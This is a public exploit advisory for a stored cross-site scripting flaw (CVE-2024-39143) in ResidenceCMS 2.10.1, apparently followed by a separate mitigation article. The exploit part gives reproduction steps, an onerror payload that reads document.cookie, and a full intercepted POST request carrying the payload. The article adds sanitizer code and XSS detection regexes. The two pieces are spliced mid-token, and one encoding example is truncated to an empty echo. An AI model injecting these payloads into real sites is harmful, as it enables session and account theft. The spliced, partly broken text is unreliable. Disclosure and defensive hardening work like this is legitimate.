ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)
# Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)
# Date: 8-7-2024
# Category: Web Application
# Exploit Author: Jeremia Geraldi Sihombing
# Version: 2.10.1
# Tested on: Windows
# CVE: CVE-2024-39143
Description:
----------------
A stored cross-site scripting (XSS) vulnerability exists in
ResidenceCMS 2.10.1 that allows a low-privilege user to create
malicious property content with HTML inside it, which acts as a
stored XSS payload. If this property page is visited by anyone
including the administrator, then the XSS payload will be triggered..
Steps to reproduce
-------------------------
1. Login as a low privilege user with property edit capability.
2. Create or Edit one of the user owned property
(We can user the default property owned by the user).
3. Fill the content form with XSS payload using the Code View feature.
Before saving it make sure to go back using the usual view to see if the HTML
is rendered or not.
Vulnerable parameter name: property[property_description][content]
Example Payload: <img src="x" onerror="alert(document.cookie)">
4. After saving the new property content and clicking the 'Finish Editing',
go to the page and see the XSS is triggered.
It is possible to trigger the XSS by using any account or even
unauthorized account.
Burp Request
-------------------
POST /en/user/property/7/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml
xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/en/user/property/7/edit
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
renovated 2-bedroom 2-bathroom
flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
Blvd, Tampa, FL
33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSgResidenceCMS 2.10.1 — Stored Cross‑Site Scripting (XSS) Overview and Mitigation
Summary
ResidenceCMS 2.10.1 contains a stored cross‑site scripting (XSS) vulnerability (publicly tracked as CVE‑2024‑39143) that allows attacker-controlled content submitted through a rich text/property content field to be stored and later executed in the browser of anyone who views the page. This article explains the vulnerability class, likely root causes, impact, safe detection strategies, and robust mitigations and code-level defenses to prevent similar issues.
What is Stored XSS?
Stored XSS occurs when an application accepts untrusted input (often from a content editor or form), persists it, and later renders it into a page without sufficient output encoding or sanitization. Because the payload is stored on the server, every future viewer of the affected page (including admins) can trigger the malicious script, enabling session theft, forced actions, credential theft, defacement, persistent redirection, or further server‑side abuse.
Why CMSs are Common Targets
- Content management systems allow users to store rich text/HTML for pages, listings, or profiles.
- WYSIWYG editors often expose a "code view" which lets users insert raw HTML that, if not cleaned, can include scriptable content or event handlers.
- Complex UIs sometimes rely on client‑side sanitization only — which can be bypassed by a direct HTTP POST or crafted request.
Typical Root Causes
- Insufficient or missing server‑side sanitization/whitelisting of HTML input.
- Relying solely on client‑side filtering or editor settings to prevent unsafe markup.
- Improper output encoding when rendering stored content into pages.
- Overly permissive allowed attributes (e.g., permitting on* attributes or javascript: URIs).
Potential Impact
- Account takeover via session cookie theft if cookies are accessible in JavaScript.
- Privilege escalation if administrators view attacker content and execute actions triggered by the script.
- Reputation damage and malicious content injection (phishing, drive‑by prompts).
- Breach of confidentiality if attacker exfiltrates data visible to the page context.
Safe Detection and Assessment (Defensive Guidance)
- Perform code review to find places where rich HTML content is accepted and then output without server‑side sanitation.
- Scan stored content in the database for suspicious patterns (e.g., inline event handlers, script tags, javascript: URIs, inline SVG scripts). Do not run payloads in production browsers.
- Use automated scanners and WAF logs to detect anomalous stored payloads, but validate findings manually to avoid false positives.
- Review WYSIWYG/editor configuration: which roles can access "code view", and whether client filters are mirrored server‑side?
Immediate Mitigation Steps for Administrators
- Upgrade ResidenceCMS to a vendor patch if available — this is the fastest long‑term fix when a security update is released.
- Temporarily restrict or disable rich text/code view features for untrusted/low‑privilege users until a fix is applied.
- Implement review/approval workflow for new or edited content from non‑trusted accounts.
- Harden session cookies (Secure, HttpOnly, SameSite) and enable a strict Content Security Policy (CSP) to reduce impact.
- Monitor access logs and webserver error logs for suspicious activity and newly created content that contains HTML.
Definitive Mitigations and Secure Coding Practices
Fixing stored XSS requires a defense‑in‑depth approach: validate, sanitize, and properly encode output. Prefer allowlist (positive) sanitization for HTML and escape when rendering into non‑HTML contexts.
Server‑side HTML sanitization (Example: PHP using HTMLPurifier)
// Example: sanitize rich HTML input before storage with HTMLPurifier
require_once '/path/to/htmlpurifier/library/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
// Configure a conservative allowlist of tags and attributes
$config->set('HTML.Allowed', 'p,b,i,u,strong,em,a[href|title|rel],ul,ol,li,br,img[src|alt|title|width|height]');
$config->set('URI.AllowedSchemes', array('http' => true, 'https' => true, 'mailto' => true));
$config->set('Attr.EnableID', false); // disable id attributes if not needed
$config->set('HTML.SafeIframe', false); // avoid iframes unless required
$purifier = new HTMLPurifier($config);
$raw = $_POST['content'] ?? '';
$clean = $purifier->purify($raw);
// store $clean in the database or render only after purification
Explanation: This code uses a server‑side HTML sanitizer (HTMLPurifier) to reduce input to an allowlisted set of tags/attributes and allowed URI schemes. Sanitize on the server prior to storage or at least prior to rendering. Avoid allowing on* event attributes or javascript: URIs.
Output encoding for non‑HTML contexts
// When outputting user data in HTML text nodes or attributes, always escape
echo htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
// For attributes
echo '';
Explanation: Use output encoding (e.g., htmlspecialchars in PHP) whenever rendering user data into HTML text nodes or attributes so that special characters cannot be interpreted as markup or script.
Content Security Policy and cookie hardening
// Set a strict CSP and secure cookie parameters in PHP
header("Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self' data: https:; object-src 'none'; frame-ancestors 'none'");
session_set_cookie_params([
'lifetime' => 0,
'path' => '/',
'domain' => 'example.com',
'secure' => true,
'httponly' => true,
'samesite' => 'Lax'
]);
Explanation: CSP reduces the impact of injected scripts by restricting where scripts and other resources may be loaded from. HttpOnly and Secure cookie flags prevent trivial client‑side cookie theft and force transport encryption.
WYSIWYG/editor configuration hardening
- Disable or restrict “code view” for untrusted/low‑privilege roles.
- Configure the editor to strip disallowed tags/attributes client‑side, but treat client filtering as convenience only — always validate server‑side.
- Whitelist image sources and disallow inline event handlers or embedded scripts within SVGs.
Operational and monitoring recommendations
- Implement a content moderation workflow so new or edited HTML content requires approval before public display.
- Scan the database for new records containing HTML; flag entries that contain potentially dangerous constructs for manual review.
- Log and alert on unusual activity (e.g., many content edits, large HTML payloads, or editor use by low‑privileged accounts).
- Use a Web Application Firewall (WAF) to block common XSS patterns as a compensating control while permanent fixes are implemented.
Detecting suspicious HTML patterns (defensive examples)
As part of scanning or review, look for suspicious constructs such as script tags, event handler attributes (on*), or javascript: and data: URIs in places that should not contain them. Use these patterns for detection and triage (not as an enforcement-only measure):
// Example defensive regex patterns (use carefully as indicators, not automated sanitizers)
'/(?i)<\s*script\b/'; // script tag
'/(?i)on[a-z]+\s*=/'; // inline event handlers like onclick=
'/(?i)javascript\s*:/'; // javascript: URI
Explanation: These patterns can help find suspicious stored HTML in a database for manual review. They are not replacements for a proper sanitizer and can produce false positives/negatives.
Responsible Disclosure and Remediation Timeline
- If you are a vendor or administrator: prioritize a patch that implements server‑side sanitization and correct editor defaults, then push that update to all deployments.
- Inform and instruct customers to upgrade and apply the immediate mitigations above until a patch is deployed.
- Encourage security testing (SAST/DAST) and include XSS checks in CI/CD pipelines.
Conclusion (Practical Checklist)
Action Priority Apply vendor security update / patch High Disable code view for untrusted roles; add review workflow High Implement server‑side HTML sanitization (allowlist) High Set strict CSP and cookie flags Medium Monitor and scan stored content and logs Medium Add XSS tests to CI/CD and penetration tests Medium
Applying these mitigations will significantly reduce the risk of stored XSS in content fields and strengthen the overall security posture of a CMS deployment. Prioritize server‑side allowlist sanitization and minimal privileges for content authors to avoid persistent client‑side script execution.